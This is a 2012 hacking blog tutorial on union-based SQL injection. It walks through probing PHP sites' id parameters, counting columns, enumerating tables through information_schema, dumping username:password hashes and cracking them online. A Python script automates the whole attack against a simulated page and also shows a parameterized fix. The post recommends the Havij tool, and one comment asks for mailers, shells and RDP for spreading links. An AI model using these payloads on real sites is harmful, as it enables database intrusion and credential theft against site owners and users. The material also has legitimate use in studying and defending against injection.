Union-Based (Basic) SQL Injection – By Georgekok97

Posted: 06/08/2012 in G.N.A.HackTeam, Hacking, Info

Today, I think you should learn UNION-Based (Basic) SQL Injection!

Here is what to do:

1) Find a site that uses PHP and passes a number in the URL, for example ...php?id=... or ...php?p=... Add a single quote (') to the end of the number.

ex. http://www.mysite.com/game.php?id=1'

If the page now shows a database error, the quote reached the query unescaped and the parameter is most likely injectable. (Note: a site that hides its errors will show nothing even when the bug is there; in that case you need boolean-based or time-based tests instead of looking for an error.)

2) Erase the single quote you typed before and type at the end order by 1-- (note the space after the two dashes; in a URL write --+ or -- - so the space is not lost). The number refers to a column position in the page's SELECT query, so what you are counting here is the number of columns that query returns, not the number of tables in the database.

ex. .com/game.php?id=1 order by 1-- (this should not give an error)

3) Keep increasing the number (2, 3, 4, 5 ...) until you get an error. The last number that does not give an error is the number of columns in the query.

ex. our query has 4 columns when:
id=1 order by 5-- (gets an error: Unknown column '5' in 'order clause')
id=1 order by 4-- (no error), so the query selects 4 columns.

4) Now make the page display a row of your own. Change the id to -1 (a value that matches no real row) so that the only row the page renders is the one from your UNION, and select as many numbers as there are columns (4 in our example):
union all select 1,2,3,4--

ex. http://www.site.com/game.php?id=-1 union all select 1,2,3,4--

(Some of the numbers will appear in different places on the page. Those are the column positions the page actually prints, so they are the positions you can read data through. Not every column is displayed, which is why some of the numbers never show up.)

5) To find the database version, replace one of the numbers that showed up on the page with @@version (or version()). Any displayed position will do; it does not have to be the first one or the one at the top of the page.
union all select 1,2,@@version,4--

ex. id=-1 union all select 1,2,@@version,4-- (if position 3 is one that the page displays; if you put @@version in a position the page never prints, you will see nothing)

You should now see the MySQL version of the site. It should be 5.x or newer: information_schema exists from MySQL 5.0 on, and the next steps depend on it. On MySQL 4 you have to guess table and column names instead.

6) To display the table names of the current database type:

ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--

(The group_concat() expression takes the place of the number that showed up on the page in the "union all select" statement, position 3 in our example, and table_schema=database() limits the list to the database the site is using.) Don't worry if the commands seem hard to learn at first; take notes and they will stick after a while.

7) To display the column names of a table (here "users") we type:

ex. union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=CHAR(117,115,101,114,115)--

CHAR() is a MySQL function that builds a string from ASCII codes; 117,115,101,114,115 spells "users". It is used so that the payload contains no quote characters, which the site may escape or strip; the hex literal 0x7573657273 does the same job. The HackBar add-on for Firefox can convert a string like "users" to either form for you.

If another database on the same server also has a table named users you will get its columns too; add and table_schema=database() to the where clause to keep the list to the site's own database.


8) To display the columns we want (let's say "username" and "password") from a table (let's say "users") we type:

ex. union all select 1,2,group_concat(username,0x3a,password),4 from users--

username: column to display
password: column to display
0x3a: hex for the ASCII colon character, so each row comes out as user:pass (written in hex so that no quote is needed)
users: table to read from


NOTE: The passwords are usually stored as MD5 (or SHA-1) hashes, not encrypted, so they cannot be decrypted. Online services look the hash up in large precomputed tables of common passwords, which only works when the password is weak or common; otherwise you have to crack it offline. For example:
http://www.md5decrypter.co.uk/

That’s it! This was the Union-Based SQL Injection!
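To make the sequence above concrete, here is an added example that is not part of the original tutorial: a toy "game.php?id=" page simulated in Python over an in-memory SQLite database, with steps 1 to 8 automated against it. SQLite stands in for MySQL, so a few names differ: sqlite_master and pragma_table_info() take the role of information_schema, sqlite_version() of @@version, and the || operator of group_concat(a,0x3a,b). The tables, rows, digests and every function name below are constructed for the demo; the second page function shows the bound-parameter fix that makes the same requests harmless.

```python
"""Added example, not code from the original post or its author: a toy
'game.php?id=' endpoint simulated in Python over an in-memory SQLite
database, with the union-based probing sequence (steps 1 to 8) run against
it. SQLite stands in for MySQL: sqlite_master and pragma_table_info() play
the role of information_schema, sqlite_version() of @@version, and '||'
of group_concat(a, 0x3a, b). Tables, rows and digests are constructed."""
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE games(id INTEGER, title TEXT, genre TEXT, year INTEGER);
        INSERT INTO games VALUES (1, 'Chess', 'board', 1475);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99'),
                                 (2, 'guest', '084e0343a1d2a3b5b4a6fb2a1b3d4e5f');
    """)
    return db

def render(rows):
    """The template prints only columns 2 and 4 of the SELECT, which is why
    only some of the union markers ever show up on screen."""
    return "\n".join("%s (%s)" % (row[1], row[3]) for row in rows)

def game_page_vulnerable(db, id_param):
    """The bug the tutorial exploits: the raw id value is pasted into SQL.
    Returns (page_text, error_text); errors are shown, like display_errors=on."""
    sql = "SELECT id, title, genre, year FROM games WHERE id=" + id_param
    try:
        return render(db.execute(sql).fetchall()), None
    except sqlite3.Error as exc:
        return "", str(exc)

def game_page_fixed(db, id_param):
    """Same query with a bound parameter: the id can only ever be a value,
    and a non-numeric id is just 'no such game', not a database error."""
    try:
        ident = int(id_param)
    except ValueError:
        return "", None
    rows = db.execute("SELECT id, title, genre, year FROM games WHERE id=?",
                      (ident,)).fetchall()
    return render(rows), None

def is_injectable(page):
    """Step 1: a lone quote breaks the SQL only if it reaches the query."""
    return page("1'")[1] is not None

def count_columns(page, max_cols=20):
    """Steps 2-3: ORDER BY n fails once n exceeds the number of columns in
    the page's SELECT (it counts columns, not tables)."""
    for n in range(1, max_cols + 1):
        if page("1 ORDER BY %d -- " % n)[1] is not None:
            return n - 1
    return None

def displayed_positions(page, ncols):
    """Step 4: id=-1 matches no real row, so the UNION row is all that gets
    rendered; every marker visible on the page is a readable position."""
    markers = ", ".join("'m%d'" % i for i in range(1, ncols + 1))
    text, _ = page("-1 UNION ALL SELECT %s -- " % markers)
    return [i for i in range(1, ncols + 1) if "m%d" % i in text]

def union_read(page, ncols, position, expr, from_clause=""):
    """Steps 5-8: one expression in a displayed position, NULL elsewhere."""
    cols = ["NULL"] * ncols
    cols[position - 1] = expr
    return page("-1 UNION ALL SELECT %s%s -- " % (", ".join(cols), from_clause))[0]

def run_attack(page):
    """The whole sequence; returns what the attacker learns, or None."""
    if not is_injectable(page):
        return None
    ncols = count_columns(page)
    shown = displayed_positions(page, ncols)
    pos = shown[0]
    return {
        "columns": ncols,
        "displayed": shown,
        "version": union_read(page, ncols, pos, "sqlite_version()"),
        "tables": union_read(page, ncols, pos, "group_concat(name)",
                             " FROM sqlite_master WHERE type='table'"),
        "user_columns": union_read(page, ncols, pos, "group_concat(name)",
                                   " FROM pragma_table_info('users')"),
        "creds": union_read(page, ncols, pos,
                            "group_concat(username || ':' || password)",
                            " FROM users"),
    }

def demo(fixed=False):
    """Run the attack against the vulnerable page, or against the fixed one."""
    db = make_db()
    page = game_page_fixed if fixed else game_page_vulnerable
    return run_attack(lambda p: page(db, p))

if __name__ == "__main__":
    print(demo())            # every step succeeds against the vulnerable page
    print(demo(fixed=True))  # None: the quote never reaches the query
```

Running it prints the column count (4), the positions the page renders (2 and 4), the version string, the table list, the columns of users and the user:hash pairs, and then None for the fixed page, because with a bound parameter the probe in step 1 never produces a database error and the attack has nowhere to start. The same payload strings work against MySQL once the SQLite-specific names are swapped back for @@version, information_schema and group_concat(a,0x3a,b).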

_________________________________________________________________________________________

Havij

You can also try Havij, a program that automates the injection (steps 2 to 8 above) once a vulnerable parameter has been found.
What you still need to do yourself is step 1!

There is a free and a paid version of Havij. Get it here: havij Download Page

_________________________________________________________________________________________

Tutorial By Georgekok97

_________________________________________________________________________________________

Please read the Disclaimer at the About Page!

Comments
  1. This Post has been Updated! Some SQL Commands were Wrong and now are Correct!
    Happy Hacking! :->

  2. Simply want to say your article is astounding. The clarity of your post is just excellent and I can suppose you're a professional in this subject. Fine, with your permission allow me to grab your RSS feed to stay up to date with upcoming posts. Thanks 1,000,000 and please carry on the gratifying work.

  3. This is simpler and certainly gives convenience to internet users. Many thanks for sharing. Posts like this provide a fantastic advantage. Thank you!

  4. Nice a person blog operator accomplishment blog put up fantastic sharings with this website at all times have enjoyable

  5. Karlene says:

    oh my god terrific publish admin will test your web site usually

  6. Sepatu Murah says:

    You did a great job. Thanks, useful for me (bad boy). 🙂

  7. Good day my fellow hackers, please can you help me with a mass sender? I need SMTP, mailer, and shell, even RDP to upload my link. Thanks.

  8. […] NOTE: SQL Injection is not demonstrated here! If you don’t know SQL Injection, read this first… […]
